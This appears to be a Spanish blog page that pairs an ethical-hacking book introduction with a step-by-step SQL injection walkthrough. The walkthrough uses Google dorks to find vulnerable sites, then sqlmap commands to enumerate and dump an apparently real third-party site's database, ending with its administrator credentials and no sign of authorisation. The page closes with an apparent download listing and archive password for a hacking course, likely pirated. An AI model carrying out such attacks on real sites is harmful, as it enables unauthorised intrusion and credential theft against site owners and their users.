.

WHAT'S NEW?
Loading...
Mostrando entradas con la etiqueta Curso hacker avanzado. Mostrar todas las entradas
Mostrando entradas con la etiqueta Curso hacker avanzado. Mostrar todas las entradas

La seguridad informática ha ganado popularidad en los últimos años y ha pasado de ser considerada un gasto, a ser vista como una inversión por parte de los directivos de las empresas y organizaciones a nivel mundial.

En algunos países esto ha sucedido de forma acelerada, en otros el paso ha sido más lento; pero en última instancia hemos convergido todos en un mundo digital en el que la información es el activo intangible más valioso con el que contamos.

Y al ser un activo, debemos protegerlo de posibles pérdidas, robos, mal uso, etc. Es aquí en donde juega un papel preponderante un actor antes desconocido: el hacker ético.

El rol del hacker ético es efectuar – desde el punto de vista de un cracker – un ataque controlado hacia la infraestructura informática de un cliente, detectando vulnerabilidades potenciales y explotando aquellas que le permitan penetrar las defensas de la red objetivo, pero sin poner en riesgo los servicios y sistemas auditados. Y todo esto con el solo propósito de alertar a la organización contratante de los riesgos de seguridad informática presentes y cómo remediarlos.

Este individuo debe tener la capacidad de saber cuándo es mejor no explotar un hueco de seguridad y solamente reportarlo al cliente Vs cuándo es preciso ejecutar un exploit para demostrar la gravedad de la vulnerabilidad. Es una mezcla entre la mente criminal de Hannibal, las acciones de la Madre Teresa y el background profesional de un verdadero nerd!

¿Pero dónde encontramos a estos héroes? La respuesta a esta pregunta se torna cada vez más difícil si creemos en los estudios realizados por importantes empresas consultoras, que indican que año a año se ensancha la brecha entre la demanda y la oferta de profesionales certificados en seguridad informática.

Y es por este motivo que se vuelve esencial contar con profesionales de tecnología entusiastas, pero sobre todo con altos valores éticos y morales, que estén dispuestos a aceptar el desafío de convertirse en pentesters.

Este libro es para ellos.

Así que si el estimado lector encaja en este perfil, entonces este libro es para usted.

No se requieren conocimientos previos de hacking ético, el nivel del libro es introductorio y por ende parte de cero en dicha área; no obstante es imprescindible tener una formación base en sistemas computacionales o tecnologías de la información.

¿Cuáles son los requisitos?

Conocer el modelo OSI y sus diferentes capas.
Poseer nociones sobre la arquitectura TCP/IP (direccionamiento IPv4, subnetting, enrutamiento, funcionamiento de protocolos como ARP, DNS, HTTP, SMTP, DHCP, etc).
Saber usar y administrar sistemas Windows y
¿Cómo está dividido el libro?

El libro se desarrolla en 7 capítulos y hemos calculado que el estudiante deberá invertir alrededor de 21 días para completarlos, con un tiempo de dedicación mínimo de 2 horas diarias. Sin embargo, el lector es libre de avanzar a su propio paso y tomarse mayor o menor tiempo.

Mi única sugerencia es que deben realizarse todos los laboratorios propuestos, inclusive con diferentes sistemas operativos víctimas a los referidos por esta servidora. Es en la variación de escenarios y en la práctica continua que se gana experiencia.


                    



Lo primero es usar google dorks que son simples comandos de busqueda inteligente mediante google

estas dos son algunas Google dorks que existen pero solamente usaremos estas
intext: es para buscar una web especifica buscara que tenga un texto en específico
inurl: buscara la extensión denominada

buscando elegimos una web a testear y dimos con esta

y testeamos poniendo un simple amperson al final de la URL y damos enter así...

vemos qué al poner el amperson ( ' ) y damos enter arroja un error de SQL una vez veamos esa vulnerabilidad comenzamos con el ataque

Utilizaremos la herramienta SQL MAP - es una tool desarrollada para Linux esta vez la utilizaremos en Windows y accedemos a su directorio.
 y con estos primeros comandos damos por comenzado el ataque
sqlmap.py -u [URL] --dbs
Dejamos trabajar el ataque
Aqui ya nos mostro que el motor de base de datos es MySQL y que es parametro injectable


Accedemos a el sistema y nos muestra las base de datos disponibles esta vez atacaremos tacnar_radiotacna


y el comando para atacar la base de dato en especifico es
sqlmap.py -u [url] -D [database Name ] --tables
una vez terminado nos muestra las tablas que contiene la base de datos
una vez en la base de datos buscas sacar los datos de una tabla  aqui la que mas me llamo la atención es la de administrador y la atacamos con los siguientes comandos
sqlmap.py -u [url] -D [databaseName] -T [TableName] -- dump

y bien logramos dumpear el usuario y contraseña de administrador de la pagina web.

Hacking ético es una forma de referirse al acto de una persona usar sus conocimientos de informática y seguridad para realizar pruebas en redes y encontrar vulnerabilidades, para luego reportarlas y que se tomen medidas, sin hacer daño. Aprende paso a paso técnicas y herramientas para identificar vulnerabilidades en sistemas informáticos y descubre cómo puedes protegerte. Aprende a proteger bases de datos, sitios web, sistemas operativos y sistemas en general con este completo curso de seguridad informática.


RAR | Español | it | 1.82 GB | clases y talleres | incl. archivos base.

Parte Numero 1
Parte Numero 2
Parte Numero 3
Parte Numero 4
Parte Numero 5
Parte Numero 6
Parte Numero 7
Parte Numero 8

Contraseña : jantem28